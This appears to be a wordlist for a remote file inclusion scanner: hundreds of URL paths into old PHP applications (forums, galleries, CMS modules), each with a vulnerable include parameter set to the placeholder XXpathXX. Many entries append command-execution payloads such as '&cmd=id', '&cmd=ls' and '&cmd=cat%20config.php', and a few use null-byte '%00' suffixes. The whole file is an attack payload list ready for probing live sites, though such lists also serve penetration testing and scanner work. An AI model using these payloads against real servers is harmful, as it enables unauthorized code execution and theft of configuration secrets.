/modules/Discipline/CategoryBreakdownTime.php?staticpath=XXpathXX
/modules/Discipline/StudentFieldBreakdown.php?staticpath=XXpathXX
/modules/Forums/admin/admin_styles.php?phpbb_root_path=XXpathXX
/modules/MusooTemplateLite.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
/modules/My_eGallery/index.php?basepath=XXpathXX
/modules/My_eGallery/public/displayCategory.php?basepath=XXpathXX
/modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=XXpathXX?
/modules/NukeAI/util.php?AIbasedir=XXpathXX
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=XXpathXX
/modules/SoundImporter.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
/modules/abook/foldertree.php?baseDir==XXpathXX?
/modules/addons/plugin.php?doc_root=XXpathXX
/modules/admin/include/config.php?doc_root=XXpathXX
/modules/admin/include/localize.php?doc_root=XXpathXX
/modules/agendax/addevent.inc.php?agendax_path=XXpathXX&cmd=id
/modules/bank/includes/design/main.inc.php?bank_data[root]=XXpathXX?
/modules/basicfog/basicfogfactory.class.php?PATH_TO_CODE=XXpathXX
/modules/birstday/birst.php?exbb[home_path]=XXpathXX?
/modules/birstday/profile_show.php?exbb[home_path]=XXpathXX?
/modules/birstday/select.php?exbb[home_path]=XXpathXX?
/modules/blocks/headerfile.php?system[path]=XXpathXX
/modules/calendar/index.php?inc_dir=XXpathXX
/modules/calendar/minicalendar.php?GLOBALS[rootdp]=./&GLOBALS[gsLanguage]=XXpathXX?
/modules/calendar/mod_calendar.php?absolute_path=XXpathXX?
/modules/certinfo/index.php?full_path=XXpathXX
/modules/character_roster/include.php?mod_root=XXpathXX?
/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=XXpathXX?
/modules/coppermine/themes/default/theme.php?THEME_DIR=XXpathXX
/modules/downloads/lib/LM_Downloads.php?pathToIndex=XXpathXX
/modules/dungeon/tick/allincludefortick.php?PATH_TO_CODE=XXpathXX
/modules/emails/index.php?full_path=XXpathXX
/modules/events/index.php?full_path=XXpathXX
/modules/fax/index.php?full_path=XXpathXX
/modules/files/blocks/latest_files.php?system[path]=XXpathXX
/modules/files/index.php?full_path=XXpathXX
/modules/files/list.php?full_path=XXpathXX
/modules/filters/headerfile.php?system[path]=XXpathXX
/modules/formmailer/formmailer.admin.inc.php?BASE_DIR[jax_formmailer]=XXpathXX?
/modules/forums/blocks/latest_posts.php?system[path]=XXpathXX
/modules/global/inc/content.inc.php?sIncPath=XXpathXX?
/modules/groupadm/index.php?full_path=XXpathXX
/modules/groups/headerfile.php?system[path]=XXpathXX
/modules/guestbook/index.php?CONFIG[local_root]=XXpathXX?
/modules/history/index.php?full_path=XXpathXX
/modules/home.module.php?repmod=XXpathXX?
/modules/horoscope/footer.php?xoopsConfig[root_path]=XXpathXX
/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=XXpathXX
/modules/info/index.php?full_path=XXpathXX
/modules/links/blocks/links.php?system[path]=XXpathXX
/modules/links/showlinks.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
/modules/links/submit_links.php?rootdp=zZz&gsLanguage=XXpathXX
/modules/log/index.php?full_path=XXpathXX
/modules/mail/index.php?full_path=XXpathXX
/modules/menu/headerfile.php?system[path]=XXpathXX
/modules/messages/index.php?full_path=XXpathXX
/modules/mod_as_category.php?mosConfig_absolute_path=XXpathXX
/modules/mod_as_category/mod_as_category.php?mosConfig_absolute_path=XXpathXX
/modules/mod_calendar.php?absolute_path=XXpathXX
/modules/mod_flatmenu.php?mosConfig_absolute_path=XXpathXX
/modules/mod_mainmenu.php?mosConfig_absolute_path=XXpathXX
/modules/mod_weather.php?absolute_path=XXpathXX?
/modules/mx_smartor/admin/admin_album_otf.php?phpbb_root_path=XXpathXX?
/modules/newbb_plus/config.php?bbPath[root_theme]=XXpathXX
/modules/newbb_plus/votepolls.php?bbPath[path]=XXpathXX
/modules/news/blocks/latest_news.php?system[path]=XXpathXX
/modules/newusergreatings/pm_newreg.php?exbb[home_path]=XXpathXX?
/modules/organizations/index.php?full_path=XXpathXX
/modules/phones/index.php?full_path=XXpathXX
/modules/pms/index.php?module_path=XXpathXX???
/modules/poll/inlinepoll.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
/modules/poll/showpoll.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX
/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=XXpathXX?
/modules/presence/index.php?full_path=XXpathXX
/modules/projects/index.php?full_path=XXpathXX
/modules/projects/list.php?full_path=XXpathXX
/modules/projects/summary.inc.php?full_path=XXpathXX
/modules/punish/p_error.php?exbb[home_path]=XXpathXX?
/modules/punish/profile.php?exbb[home_path]=XXpathXX?
/modules/reports/index.php?full_path=XXpathXX
/modules/search/index.php?full_path=XXpathXX
/modules/search/search.php?language_home=&rootdp=zZz&gsLanguage=XXpathXX?
/modules/settings/headerfile.php?system[path]=XXpathXX
/modules/snf/index.php?full_path=XXpathXX
/modules/syslog/index.php?full_path=XXpathXX
/modules/tasks/index.php?full_path=XXpathXX
/modules/tasks/searchsimilar.php?full_path=XXpathXX
/modules/tasks/summary.inc.php?full_path=XXpathXX
/modules/threadstop/threadstop.php?exbb[home_path]=XXpathXX?
/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX
/modules/tml/block.tag.php?GLOBALS[PTH][classes]=XXpathXX
/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=XXpathXX
/modules/useradm/index.php?full_path=XXpathXX
/modules/users/headerfile.php?system[path]=XXpathXX
/modules/vWar_Account/includes/functions_common.php?vwar_root2=XXpathXX
/modules/visitors2/include/config.inc.php?lvc_include_dir=XXpathXX?
/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=XXpathXX
/modules/wiwimod/spaw/spaw_control.class.php?spaw_root=XXpathXX
/modules/xfsection/modify.php?dir_module=XXpathXX
/modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=XXpathXX
/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX
/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=XXpathXX?
/modulistica/mdl_save.php?CLASSPATH=XXpathXX
/modx-0.9.6.2/assets/snippets/reflect/snippet.reflect.php?reflect_base=XXpathXX?
/moodle/admin/utfdbmigrate.php?cmd=XXpathXX
/moosegallery/display.php?type=XXpathXX?&cmd=[command]
/mostlyce/jscripts/tiny_mce/plugins/htmltemplate/htmltemplate.php?mosConfig_absolute_path=XXpathXX
/moteur/moteur.php?chemin=XXpathXX?
/movie_cls.php?full_path=XXpathXX
/msDb.php?GLOBALS[ini_array][EXTLIB_PATH]=XXpathXX
/music/buycd.php?HTTP_DOCUMENT_ROOT=XXpathXX?
/mutant_includes/mutant_functions.php?phpbb_root_path=XXpathXX
/mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=XXpathXX
/mxBB/modules/mx_newssuite/includes/newssuite_constants.php?mx_root_path=XXpathXX
/mygallery/myfunctions/mygallerybrowser.php?myPath=XXpathXX
/myphpcommander_path/system/lib/package.php?gl_root=XXpathXX?cmd
/mysave.php?file=XXpathXX
/naboard_pnr.php?skin=XXpathXX?
/ncaster/admin/addons/archive/archive.php?adminfolder=XXpathXX
/network_module_selector.php?path_prefix=XXpathXX
/news.php?CONFIG[script_path]=XXpathXX?
/news.php?config[root_ordner]=XXpathXX?&cmd=id
/news.php?scriptpath=XXpathXX?
/news.php?vwar_root=XXpathXX
/news/include/createdb.php?langfile;=XXpathXX?
/news/include/customize.php?l=XXpathXX?
/news/newstopic_inc.php?indir=XXpathXX
/news/scripts/news_page.php?script_path=XXpathXX?
/newsadmin.php?action=XXpathXX
/newsarchive.php?path_to_script=XXpathXX?&cmd=ls
/newsfeeds/includes/aggregator.php?zf_path=XXpathXX
/newsfeeds/includes/controller.php?zf_path=XXpathXX
/newsletter/newsletter.php?waroot=XXpathXX
/newsp/lib/class.Database.php?path=XXpathXX?
/newticket.php?lang=XXpathXX
/noah/modules/noevents/templates/mfa_theme.php?tpls[1]=XXpathXX
/noticias.php?inc=XXpathXX?
/nucleus/plugins/skinfiles/index.php?DIR_LIBS=XXpathXX
/nuke_path/iframe.php?file=XXpathXX
/nukebrowser.php?filnavn=XXpathXX&filhead=XXpathXX&cmd=id
/nuseo/admin/nuseo_admin_d.php?nuseo_dir=XXpathXX?
/oaboard_en/forum.php?inc=XXpathXX
/ocp-103/index.php?req_path=XXpathXX
/ocs/include/footer.inc.php?fullpath=XXpathXX?
/ocs/include/theme.inc.php?fullpath=XXpathXX?
/ocs/openemr-2.8.2/custom/import_xml.php?srcdir=XXpathXX?
/olbookmarks-0.7.4/themes/test1.php?XXpathXX
/oneadmin/adminfoot.php?path[docroot]=XXpathXX
/oneadmin/blogger/sampleblogger.php?path[docroot]=XXpathXX?
/oneadmin/config-bak.php?include_once=XXpathXX
/oneadmin/config.php?path[docroot]=XXpathXX
/oneadmin/ecommerce/sampleecommerce.php?path[docroot]=XXpathXX?
/online.php?config[root_ordner]=XXpathXX?&cmd=id
/open-admin/plugins/site_protection/index.php?config%5boi_dir%5d=XXpathXX?
/openi-admin/base/fileloader.php?config[openi_dir]=XXpathXX
/openrat/themes/default/include/html/insert.inc.php?tpl_dir=XXpathXX???
/opensurveypilot/administration/user/lib/group.inc.php?cfgPathToProjectAdmin=XXpathXX
/ops/gals.php?news_file=XXpathXX
/order/login.php?svr_rootscript=XXpathXX
/osData/php121/php121db.php?php121dir=XXpathXX%00
/ossigeno-suite-2.2_pre1/upload/xax/admin/modules/uninstall_module.php?level=XXpathXX?
/ossigeno_modules/ossigeno-catalogo/xax/ossigeno/catalogo/common.php?ossigeno=XXpathXX?
/owimg.php3?path=XXpathXX
/p-news.php?pn_lang=XXpathXX
/pafiledb/includes/pafiledb_constants.php?module_root_path=XXpathXX
/page.php?goto=XXpathXX
/page.php?id=XXpathXX
/panel/common/theme/default/header_setup.php?path[docroot]=XXpathXX
/param_editor.php?folder=XXpathXX?
/parse/parser.php?WN_BASEDIR=XXpathXX
/patch/?language_id=XXpathXX
/patch/tools/send_reminders.php?noSet=0&includedir=XXpathXX?
/paypalipn/ipnprocess.php?INC=XXpathXX?
/pda/pda_projects.php?offset=XXpathXX
/phfito/phfito-post?SRC_PATH=XXpathXX
/phorum/plugin/replace/plugin.php?PHORUM[settings_dir]=XXpathXX
/photo_comment.php?toroot=XXpathXX
/php-inc/log.inc.php?SKIN_URL=XXpathXX
/php-include-robotsservices.php?page=XXpathXX
/php-nuke/modules/Forums/admin/admin_styles.php?phpbb_root_path=XXpathXX
/php.incs/common.inc.php?cm_basedir=XXpathXX?
/php/init.gallery.php?include_class=XXpathXX/something
/php121db.php?php121dir=XXpathXX%00
/php4you.php?dir=XXpathXX?
/phpAdsNew-2.0.7/libraries/lib-remotehost.inc?phpAds_geoPlugin=XXpathXX?
/phpBB2/shoutbox.php?phpbb_root_path=XXpathXX
/phpCards.header.php?CardPath=XXpathXX?
/phpGedView/help_text_vars.php?cmd=dir&PGV_BASE_DIRECTORY=XXpathXX
/phpMyChat.php3?=XXpathXX?cmd=id
/phpMyConferences_8.0.2/common/visiteurs/include/menus.inc.php?lvc_include_dir=XXpathXX?
/phpQLAdmin-2.2.7/ezmlm.php?_SESSION[path]=XXpathXX?
/phpSiteBackup-0.1/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX
/phpbb/sendmsg.php?phpbb_root_path=XXpathXX
/phpcalendar/includes/calendar.php?phpc_root_path=XXpathXX?
/phpcalendar/includes/setup.php?phpc_root_path=XXpathXX?
/phpdebug_PATH/test/debug_test.php?debugClassLocation=XXpathXX
/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=XXpathXX
/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=XXpathXX
/phphd_downloads/common.php?phphd_real_path=XXpathXX
/phphost_directoryv2/include/admin.php?rd=XXpathXX?
/phphtml.php?htmlclass_path=XXpathXX
/phpi/edit_top_feature.php?include_connection=XXpathXX
/phpi/edit_topics_feature.php?include_connection=XXpathXX
/phplib/site_conf.php?ordnertiefe=XXpathXX
/phplib/version/1.3.3/functionen/class.csv.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/functionen/produkte_nach_serie.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/functionen/ref_kd_rubrik.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/hg_referenz_jobgalerie.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/produkte_nach_serie_alle.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/ref_kd_rubrik.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/referenz.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/surfer_aendern.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/module/surfer_anmeldung_NWL.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/standard/1/lay.php?tt_docroot=XXpathXX
/phplib/version/1.3.3/standard/3/lay.php?tt_docroot=XXpathXX
/phplinks/includes/smarty.php?full_path_to_public_program=XXpathXX
/phporacleview/inc/include_all.inc.php?page_dir=XXpathXX?
/phppc/poll.php?is_phppc_included=1&relativer_pfad=XXpathXX?
/phppc/poll_kommentar.php?is_phppc_included=1&relativer_pfad=XXpathXX?
/phppc/poll_sm.php?is_phppc_included=1&relativer_pfad=XXpathXX?
/phpquickgallery/gallery_top.inc.php?textFile=XXpathXX
/phpreactor/inc/polls.inc.php?pathtohomedir=XXpathXX?
/phpreactor/inc/updatecms.inc.php?pathtohomedir=XXpathXX?
/phpreactor/inc/users.inc.php?pathtohomedir=XXpathXX?
/phpreactor/inc/view.inc.php?pathtohomedir=XXpathXX?
/phpress/adisplay.php?lang=XXpathXX
/phpunity-postcard.php?plgallery_epost=1&gallery_path=XXpathXX?
/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=XXpathXX
/phpwcms_template/inc_script/frontend_render/navigation/config_PHPLM.php?HTML_MENU_DirPath=XXpathXX
/phpyabs/moduli/libri/index.php?Azione=XXpathXX
/pirvate/ltwpdfmonth.php?ltw_config['include_dir]=XXpathXX
/playlist.php?phpbb_root_path=XXpathXX
/plugin/HP_DEV/cms2.php?s_dir=XXpathXX?
/plugin/gateway/gnokii/init.php?apps_path[plug]=XXpathXX?
/plugins/1_Adressbuch/delete.php?folder=XXpathXX
/plugins/BackUp/Archive.php?bkpwp_plugin_path=XXpathXX?
/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=XXpathXX?
/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=XXpathXX?
/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=XXpathXX?
/plugins/links/functions.inc?_CONF[path]=XXpathXX
/plugins/polls/functions.inc?_CONF[path]=XXpathXX
/plugins/rss_importer_functions.php?sitepath=XXpathXX?
/plugins/safehtml/HTMLSax3.php?dir[plugins]=XXpathXX?
/plugins/safehtml/safehtml.php?dir[plugins]=XXpathXX?
/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=XXpathXX
/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=XXpathXX
/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=XXpathXX
/plugins/spamx/Import.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/LogView.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=XXpathXX
/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=XXpathXX
/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=XXpathXX
/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=XXpathXX
/plugins/staticpages/functions.inc?_CONF[path]=XXpathXX
/plugins/widgets/htmledit/htmledit.php?_POWL[installPath]=XXpathXX
/plume-1.1.3/manager/tools/link/dbinstall.php?cmd=ls&_PX_config[manager_path]=XXpathXX
/plus.php?_pages_dir=XXpathXX?
/pmapper-3.2-beta3/incphp/globals.php?_SESSION[PM_INCPHP]=XXpathXX?
/pmi_v28/Includes/global.inc.php?strIncludePrefix=XXpathXX
/pmi_v28/Includes/global.inc.php?strIncludePrefix=XXpathXX?
/podcastgen1.0beta2/components/xmlparser/loadparser.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/admin.php?p=admin&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/categories.php?categoriesenabled=yes&do=categories&action=del&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/categories_add.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/categories_remove.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/edit.php?p=admin&do=edit&c=ok&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/editdel.php?p=admin&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/ftpfeature.php?p=admin&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/login.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/pgRSSnews.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/showcat.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/admin/upload.php?p=admin&do=upload&c=ok&absoluteurl=XXpathXX
/podcastgen1.0beta2/core/archive_cat.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/archive_nocat.php?absoluteurl=XXpathXX
/podcastgen1.0beta2/core/recent_list.php?absoluteurl=XXpathXX
/poll/view.php?int_path=XXpathXX
/pollvote.php?pollname=XXpathXX?&cmd=ls
/pop.php?base=XXpathXX
/popup_window.php?site_isp_root=XXpathXX?
/port.php?content=XXpathXX
/portal/includes/portal_block.php?phpbb_root_path=XXpathXX
/portal/portal.php?phpbb_root_path=XXpathXX?
/portfolio.php?id=XXpathXX
/portfolio/commentaires/derniers_commentaires.php?rep=XXpathXX?
/post_static_0-11/_lib/fckeditor/upload_config.php?DDS=XXpathXX
/prepare.php?xcart_dir=XXpathXX?
/prepend.php?_PX_config[manager_path]=XXpathXX
/preview.php?php_script_path=XXpathXX?&cmd=dir
/principal.php?conteudo=XXpathXX
/print.php?page=XXpathXX
/print.php?pager=XXpathXX
/print.php?print=XXpathXX?
/process.php?DEFAULT_SKIN=XXpathXX
/professeurs/index.php?repertoire_config=XXpathXX
/profil.php?config[root_ordner]=XXpathXX?&cmd=id
/projects/weatimages/demo/index.php?ini[langpack]=XXpathXX
/promocms/newspublish/include.php?path[bdocroot]=XXpathXX
/protection.php?logout_page=XXpathXX?
/provider/auth.php?xcart_dir=XXpathXX?
/psynch/nph-psa.exe?css=XXpathXX
/psynch/nph-psf.exe?css=XXpathXX
/public_html/add-ons/modules/sysmanager/plugins/install.plugin.php?AURORA_MODULES_FOLDER=XXpathXX?
/public_html/modules/Forums/favorites.php?nuke_bb_root_path=XXpathXX?
/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=XXpathXX
/public_includes/pub_popup/popup_finduser.php?vsDragonRootPath=XXpathXX
/qsgen_0.7.2c/qlib/smarty.inc.php?CONFIG[gameroot]=XXpathXX?
/qsgen_0.7.2c/server_request.php?CONFIG[gameroot]=XXpathXX?
/qte_web.php?qte_web_path=XXpathXX?
/quick_reply.php?phpbb_root_path=XXpathXX&mode=[file]
/quickie.php?QUICK_PATH=XXpathXX?&cmd=id
/random2.php?path_to_folder=XXpathXX
/randshop/index.php?incl=XXpathXX?
/rdf.php?page[path]=XXpathXX?&cmd=ls
/reactivate.php?base_dir=XXpathXX
/read.php?data=XXpathXX?
/readmore.php?config["sipssys"]=XXpathXX
/recent.php?insPath=XXpathXX
/rechnung.php?_PHPLIB[libdir]=XXpathXX?
/reconfig.php?GLOBALS[CLPath]=XXpathXX
/redaxo/include/addons/import_export/pages/index.inc.php?REX[INCLUDE_PATH]=XXpathXX
/redirect.php?url=XXpathXX
/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=XXpathXX
/register.php?base_dir=XXpathXX
/releasenote.php?mosConfig_absolute_path=XXpathXX
/rempass.php?lang=XXpathXX
/report.php?scriptpath=XXpathXX?
/reports/who_r.php?bj=XXpathXX
/resources/includes/class.Smarty.php?cfg[sys][base_path]=XXpathXX
/ressourcen/dbopen.php?home=XXpathXX?
/robotstats.inc.php?DOCUMENT_ROOT=XXpathXX?
/root/public/code/cp_html2txt.php?page=XXpathXX
/routines/fieldValidation.php?jssShopFileSystem=XXpathXX
/rspa/framework/Controller_v4.php?__ClassPath=XXpathXX
/rspa/framework/Controller_v4.php?__ClassPath=XXpathXX?
/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=XXpathXX
/rspa/framework/Controller_v5.php?__IncludeFilePHPClass=XXpathXX?
/rss.php?page[path]=XXpathXX?&cmd=ls
/rss.php?phpraid_dir=XXpathXX
/rss.php?premodDir=XXpathXX
/rss2.php?page[path]=XXpathXX?&cmd=ls
/run.php?dir=SHELL?&file=XXpathXX
/s01.php?shopid=XXpathXX
/s01.php?shopid=XXpathXX?
/s02.php?shopid=XXpathXX?
/s03.php?shopid=XXpathXX?
/s04.php?shopid=XXpathXX?
/sablonlar/gunaysoft/gunaysoft.php?icerikyolu=XXpathXX
/sablonlar/gunaysoft/gunaysoft.php?sayfaid=XXpathXX
/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=XXpathXX
/saf/lib/PEAR/PhpDocumentor/Documentation/tests/559668.php?FORUM[LIB]=XXpathXX?
/sample/xls2mysql/parser_path=XXpathXX?
/save.php?file_save=XXpathXX
/saveserver.php?thisdir=XXpathXX
/script//ident/index.php?path_inc=XXpathXX
/script/_conf/core/common-tpl-vars.php?confdir=XXpathXX?
/script/common.inc.php?path_inc=XXpathXX
/script/gestion/index.php?path_inc=XXpathXX
/script/ident/disconnect.php?path_inc=XXpathXX
/script/ident/ident.inc.php?path_inc=XXpathXX
/script/ident/identification.php?path_inc=XXpathXX
/script/ident/loginliste.php?path_inc=XXpathXX
/script/ident/loginmodif.php?path_inc=XXpathXX
/script/index.php?path_inc=XXpathXX
/script/init/createallimagecache.php?PATH_TO_CODE=XXpathXX
/script/menu/menuadministration.php?path_inc=XXpathXX
/script/menu/menuprincipal.php?path_inc=XXpathXX
/script/param/param.inc.php?path_inc=XXpathXX
/script/plugins/phpgacl/admin/index.php?path_inc=XXpathXX
/script/template/index.php?main_page_directory=XXpathXX
/script/tick/allincludefortick.php?PATH_TO_CODE=XXpathXX
/script/tick/test.php?PATH_TO_CODE=XXpathXX
/script_path/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=XXpathXX?
/script_path/cms/classes/openengine/filepool.php?oe_classpath=XXpathXX?
/script_path/installation/index.php?mosConfig_absolute_path=XXpathXX?
/script_path/pgvnuke/pgvindex.php?DOCUMENT_ROOT/header.php=XXpathXX
/scripts/check-lom.php?ETCDIR=XXpathXX
/scripts/gallery.scr.php?GLOBALS[PTH][func]=XXpathXX?
/scripts/lom_update.php?ETCDIR=XXpathXX
/scripts/news.scr.php?GLOBALS[PTH][classes]=XXpathXX?
/scripts/polls.scr.php?GLOBALS[PTH][classes]=XXpathXX?
/scripts/rss.scr.php?GLOBALS[PTH][classes]=XXpathXX?
/scripts/search.scr.php?GLOBALS[PTH][classes]=XXpathXX?
/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=XXpathXX
/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=XXpathXX?
/scripts/weigh_keywords.php?ETCDIR=XXpathXX
/scripts/xtextarea.scr.php?GLOBALS[PTH][spaw]=XXpathXX?
/search.php?config["sipssys"]=XXpathXX
/search.php?id=XXpathXX
/search.php?insPath=XXpathXX
/search/submit.php?config["sipssys"]=XXpathXX
/search_wA.php?LIBPATH=XXpathXX
/searchbot.php?path=XXpathXX
/security/include/_class.security.php?PHPSECURITYADMIN_PATH=XXpathXX
/sendstudio/admin/includes/createemails.inc.php?ROOTDIR=XXpathXX?
/sendstudio/admin/includes/send_emails.inc.php?ROOTDIR=XXpathXX?
/senetman/html/index.php?page=XXpathXX
/services.php?page=XXpathXX
/services/samples/inclusionService.php?CabronServiceFolder=XXpathXX%00
/settings.php?P[includes]=XXpathXX
/settings_sql.php?path=XXpathXX
/setup/inc/database.php?tcms_administer_site=XXpathXX
/setup/upgrader.php?RootDirectory=XXpathXX
/sezhoo/SezHooTabsAndActions.php?IP=XXpathXX
/shop/includes/header.inc.php?dateiPfad=XXpathXX
/shop/index.php?action=XXpathXX?&cmd=cat%20config.php
/shop/page.php?osCsid=XXpathXX?
/shop/page.php?pageid=XXpathXX?
/shoutbox.php?language=XXpathXX
/shoutbox.php?root=XXpathXX?cmd=id
/show.php?file=XXpathXX
/show.php?id=XXpathXX
/show.php?page=XXpathXX
/show.php?path=XXpathXX
/show_archives.php?cutepath=XXpathXX?
/sid=XXXXXXXXXXXXXXXXXXXXXXXXXXXX&shopid=XXpathXX
/sid=XXpathXX
/signer/final.php?smiley=XXpathXX?
/signin.php?sent=1&AMG_serverpath=XXpathXX
/sinagb.php?fuss=XXpathXX
/sinapis.php?fuss=XXpathXX
/sitebar/Integrator.php?file=XXpathXX
/sitebar/index.php?writerFile=XXpathXX
/sitebuilder/admin/top.php?admindir=XXpathXX
/sitemap.xml.php?dir[classes]=XXpathXX
/skin/board/default/doctype.php?dir=XXpathXX
/skin/dark/template.php?path=XXpathXX
/skin/gold/template.php?path=XXpathXX
/skin/html/table.php?pachtofile=XXpathXX
/skin/original/template.php?path=XXpathXX
/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=XXpathXX
/skins/advanced/advanced1.php?pluginpath[0]=XXpathXX
/skins/default.php?dir_inc=XXpathXX
/skins/header.php?ote_home=XXpathXX
/skins/phpchess/layout_admin_cfg.php?Root_Path=XXpathXX
/skins/phpchess/layout_cfg.php?Root_Path=XXpathXX
/skins/phpchess/layout_t_top.php?Root_Path=XXpathXX
/skysilver/login.tpl.php?theme=XXpathXX?
/slogin_lib.inc.php?slogin_path=XXpathXX?
/smarty.php?xcart_dir=XXpathXX?
/smarty/smarty_class.php?_smarty_compile_path=XXpathXX
/smilies.php?config=XXpathXX
/snippetmaster/includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=XXpathXX?
/snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=XXpathXX?
/snort/base_stat_common.php?BASE_path=XXpathXX
/social_game_play.php?path=XXpathXX?
/software_upload/public_includes/pub_templates/vphptree/template.php?vsDragonRootPath=XXpathXX
/song.php?phpbb_root_path=XXpathXX
/source.php?bibtexrootrel=XXpathXX?
/source/mod/rss/channeledit.php?Codebase=XXpathXX
/source/mod/rss/post.php?Codebase=XXpathXX
/source/mod/rss/view.php?Codebase=XXpathXX
/source/mod/rss/viewitem.php?Codebase=XXpathXX
/sources/Admin/admin_cats.php?CONFIG[main_path]=XXpathXX
/sources/Admin/admin_edit.php?CONFIG[main_path]=XXpathXX
/sources/Admin/admin_import.php?CONFIG[main_path]=XXpathXX
/sources/Admin/admin_templates.php?CONFIG[main_path]=XXpathXX
/sources/functions.php?CONFIG[main_path]=XXpathXX
/sources/help.php?CONFIG[main_path]=XXpathXX
/sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=XXpathXX
/sources/lostpw.php?FORM[set]=1&FORM[session_id]=1&CONFIG[path]=XXpathXX
/sources/mail.php?CONFIG[main_path]=XXpathXX
/sources/misc/new_day.php?path=XXpathXX
/sources/news.php?CONFIG[main_path]=XXpathXX
/sources/post.php?fil_config=XXpathXX
/sources/template.php?CONFIG[main_path]=XXpathXX
/sources/tourney/index.php?page=XXpathXX?
/spaw/spaw_control.class.php?GLOBALS[spaw_root]=XXpathXX
/spaw/spaw_control.class.php?spaw_root=XXpathXX
/speedberg/include/entrancePage.tpl.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/generalToolBox.tlb.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/myToolBox.tlb.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/scriplet.inc.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/simplePage.tpl.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/speedberg.class.php?SPEEDBERG_PATH=XXpathXX
/speedberg/include/standardPage.tpl.php?SPEEDBERG_PATH=XXpathXX
/spellcheckwindowframeset.php?SpellIncPath=XXpathXX
/squirrelcart/cart_content.php?cart_isp_root=XXpathXX
/src/ark_inc.php?cfg_pear_path=XXpathXX?
/src/browser/resource/categories/resource_categories_view.php?CLASSES_ROOT=XXpathXX
/src/scripture.php?pageHeaderFile=XXpathXX?
/starnet/themes/c-sky/main.inc.php?cmsdir=XXpathXX?
/start.php?lang=XXpathXX
/start.php?pg=XXpathXX
/stat_modules/users_age/module.php?phpbb_root_path=XXpathXX
/stats.php?vwar_root=XXpathXX
/stphpapplication.php?STPHPLIB_DIR=XXpathXX
/stphpbtnimage.php?STPHPLIB_DIR=XXpathXX
/stphpform.php?STPHPLIB_DIR=XXpathXX
/str.php?p=XXpathXX
/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=XXpathXX
/streamline-1.0-beta4/src/core/theme/includes/account_footer.php?sl_theme_unix_path=XXpathXX?
/strload.php?LangFile=XXpathXX
